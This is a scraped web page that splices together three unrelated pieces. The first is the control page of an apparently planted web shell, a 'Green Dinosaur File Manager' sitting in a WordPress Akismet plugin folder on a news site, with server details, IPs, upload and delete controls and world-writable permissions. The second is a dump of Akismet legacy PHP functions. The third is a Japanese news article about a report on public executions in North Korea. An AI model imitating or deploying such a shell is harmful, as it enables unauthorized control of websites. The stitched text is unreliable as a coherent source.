FILE MANAGER v.1.0

Green Dinosaur

File Manager
OS :Linux | Linux kusanagi83 3.10.0-1160.25.1.el7.x86_64 #1 SMP Wed Apr 28 21:49:45 UTC 2021 x86_64
Host: nknews.jp
Your IP : 3.12.71.115 | Server IP : 160.16.198.40 | Admin :

To Directory:
Upload:
Create Directory:
Name Type Size Last Modified Permissions Actions
[ .. ]Oct 19,2024 11:40:40
[ views ]DirectoryOct 15,2024 15:42:58drwxrwxrwxRename | Delete
[ _inc ]DirectoryOct 15,2024 12:00:36drwxrwxrwxRename | Delete
wrapper.phpFile22.8 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
class.akismet.phpFile71.86 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
readme.txtFile5.9 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
class.akismet-cli.phpFile4.66 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
class.akismet-widget.phpFile3.07 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
class.akismet-rest-api.phpFile17.32 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
LICENSE.txtFile17.67 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
changelog.txtFile21.45 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
index.phpFile26 BOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
akismet.phpFile2.56 KBOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete
.htaccessFile772 BOct 15,2024 12:00:36-rwxrwxrwxDownload | Rename | Delete

© Green Dinosaur & File Manager ©

global $wpcom_api_key, $akismet_api_host, $akismet_api_port; $wpcom_api_key = defined( 'WPCOM_API_KEY' ) ? constant( 'WPCOM_API_KEY' ) : ''; $akismet_api_host = Akismet::get_api_key() . '.rest.akismet.com'; $akismet_api_port = 80; function akismet_test_mode() { return Akismet::is_test_mode(); } function akismet_http_post( $request, $host, $path, $port = 80, $ip = null ) { $path = str_replace( '/1.1/', '', $path ); return Akismet::http_post( $request, $path, $ip ); } function akismet_microtime() { return Akismet::_get_microtime(); } function akismet_delete_old() { return Akismet::delete_old_comments(); } function akismet_delete_old_metadata() { return Akismet::delete_old_comments_meta(); } function akismet_check_db_comment( $id, $recheck_reason = 'recheck_queue' ) { return Akismet::check_db_comment( $id, $recheck_reason ); } function akismet_rightnow() { if ( !class_exists( 'Akismet_Admin' ) ) return false; return Akismet_Admin::rightnow_stats(); } function akismet_admin_init() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_version_warning() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_load_js_and_css() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_nonce_field( $action = -1 ) { return wp_nonce_field( $action ); } function akismet_plugin_action_links( $links, $file ) { return Akismet_Admin::plugin_action_links( $links, $file ); } function akismet_conf() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_stats_display() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_stats() { return Akismet_Admin::dashboard_stats(); } function akismet_admin_warnings() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_comment_row_action( $a, $comment ) { return Akismet_Admin::comment_row_actions( $a, $comment ); } function akismet_comment_status_meta_box( $comment ) { return Akismet_Admin::comment_status_meta_box( $comment ); } function akismet_comments_columns( $columns ) { _deprecated_function( __FUNCTION__, '3.0' ); return $columns; } function akismet_comment_column_row( $column, $comment_id ) { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_text_add_link_callback( $m ) { return Akismet_Admin::text_add_link_callback( $m ); } function akismet_text_add_link_class( $comment_text ) { return Akismet_Admin::text_add_link_class( $comment_text ); } function akismet_check_for_spam_button( $comment_status ) { return Akismet_Admin::check_for_spam_button( $comment_status ); } function akismet_submit_nonspam_comment( $comment_id ) { return Akismet::submit_nonspam_comment( $comment_id ); } function akismet_submit_spam_comment( $comment_id ) { return Akismet::submit_spam_comment( $comment_id ); } function akismet_transition_comment_status( $new_status, $old_status, $comment ) { return Akismet::transition_comment_status( $new_status, $old_status, $comment ); } function akismet_spam_count( $type = false ) { return Akismet_Admin::get_spam_count( $type ); } function akismet_recheck_queue() { return Akismet_Admin::recheck_queue(); } function akismet_remove_comment_author_url() { return Akismet_Admin::remove_comment_author_url(); } function akismet_add_comment_author_url() { return Akismet_Admin::add_comment_author_url(); } function akismet_check_server_connectivity() { return Akismet_Admin::check_server_connectivity(); } function akismet_get_server_connectivity( $cache_timeout = 86400 ) { return Akismet_Admin::get_server_connectivity( $cache_timeout ); } function akismet_server_connectivity_ok() { _deprecated_function( __FUNCTION__, '3.0' ); return true; } function akismet_admin_menu() { return Akismet_Admin::admin_menu(); } function akismet_load_menu() { return Akismet_Admin::load_menu(); } function akismet_init() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_get_key() { return Akismet::get_api_key(); } function akismet_check_key_status( $key, $ip = null ) { return Akismet::check_key_status( $key, $ip ); } function akismet_update_alert( $response ) { return Akismet::update_alert( $response ); } function akismet_verify_key( $key, $ip = null ) { return Akismet::verify_key( $key, $ip ); } function akismet_get_user_roles( $user_id ) { return Akismet::get_user_roles( $user_id ); } function akismet_result_spam( $approved ) { return Akismet::comment_is_spam( $approved ); } function akismet_result_hold( $approved ) { return Akismet::comment_needs_moderation( $approved ); } function akismet_get_user_comments_approved( $user_id, $comment_author_email, $comment_author, $comment_author_url ) { return Akismet::get_user_comments_approved( $user_id, $comment_author_email, $comment_author, $comment_author_url ); } function akismet_update_comment_history( $comment_id, $message, $event = null ) { return Akismet::update_comment_history( $comment_id, $message, $event ); } function akismet_get_comment_history( $comment_id ) { return Akismet::get_comment_history( $comment_id ); } function akismet_cmp_time( $a, $b ) { return Akismet::_cmp_time( $a, $b ); } function akismet_auto_check_update_meta( $id, $comment ) { return Akismet::auto_check_update_meta( $id, $comment ); } function akismet_auto_check_comment( $commentdata ) { return Akismet::auto_check_comment( $commentdata ); } function akismet_get_ip_address() { return Akismet::get_ip_address(); } function akismet_cron_recheck() { return Akismet::cron_recheck(); } function akismet_add_comment_nonce( $post_id ) { return Akismet::add_comment_nonce( $post_id ); } function akismet_fix_scheduled_recheck() { return Akismet::fix_scheduled_recheck(); } function akismet_spam_comments() { _deprecated_function( __FUNCTION__, '3.0' ); return array(); } function akismet_spam_totals() { _deprecated_function( __FUNCTION__, '3.0' ); return array(); } function akismet_manage_page() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_caught() { _deprecated_function( __FUNCTION__, '3.0' ); } function redirect_old_akismet_urls() { _deprecated_function( __FUNCTION__, '3.0' ); } function akismet_kill_proxy_check( $option ) { _deprecated_function( __FUNCTION__, '3.0' ); return 0; } function akismet_pingback_forwarded_for( $r, $url ) { // This functionality is now in core. return false; } function akismet_pre_check_pingback( $method ) { return Akismet::pre_check_pingback( $method ); } 「女性16人」を並ばせた、金正恩“残酷ショー”の衝撃場面 | NKR

「女性16人」を並ばせた、金正恩“残酷ショー”の衝撃場面

もっとも読まれている記事:北朝鮮の15歳少女「見せしめ強制体験」の生々しい場面
北朝鮮の人権問題を追及している民間団体が北朝鮮国内で公開処刑が行われた場所などを示したマップを作成し、15日に報告書を発表した。

韓国・ソウルに本部を置く「転換期正義ワーキンググループ(Transitional Justice Working Group=TJWG)」は、北朝鮮の政権が行っている人権侵害を記録することで、そのような行為をやめるよう警告すると同時に、将来的な加害者の法的処罰の可能性を高める目的で、このプロジェクトを進めてきた。報告書の発表は、2017年7月と2019年6月に続き3回目。

「金正恩期の処刑マッピング」と題された今回の報告書では、脱北者の証言442件を分析。国際社会の監視の目を避け、国境から離れた場所で公開処刑を行っていることなど、金正恩政権期になって見られるようになった特徴を列挙している。

最も残虐な処刑

その中に、いかにも金正恩総書記が好みそうな演出がなされた例がある。

報告書で言及された目撃証言によると、その出来事は2013年頃のある日、首都・平壌の近郊で起きた。一度に16人が公開裁判に引き出されたことがあったというが、各自の罪状はつまびらかでない。

いずれにせよ、死刑判決が予想される重罪だったようだ。公開処刑が頻繁に行われる河川敷などで判決が言い渡される場合、被告も見守る人々も、銃殺刑が即時執行されると考え緊張する。もしかしたら被告らも、それ以前に公開処刑を見せられたことがあったかもしれない。

例えば同年8月、姜健総合軍官学校の射撃場で銀河水管弦楽団と旺載山(ワンジェサン)芸術団のメンバーら9人が銃殺された例がある。銀河水(ウナス)管弦楽団は、金正恩総書記の夫人である李雪主(リ・ソルチュ)氏がかつて所属していた楽団だ。

機関銃でズタズタに

処刑されたメンバーらは、ソルチュ氏に「元カレ」がいたことを示す「証拠写真」を回し見したとされ、これが、罪に問われたと言われている。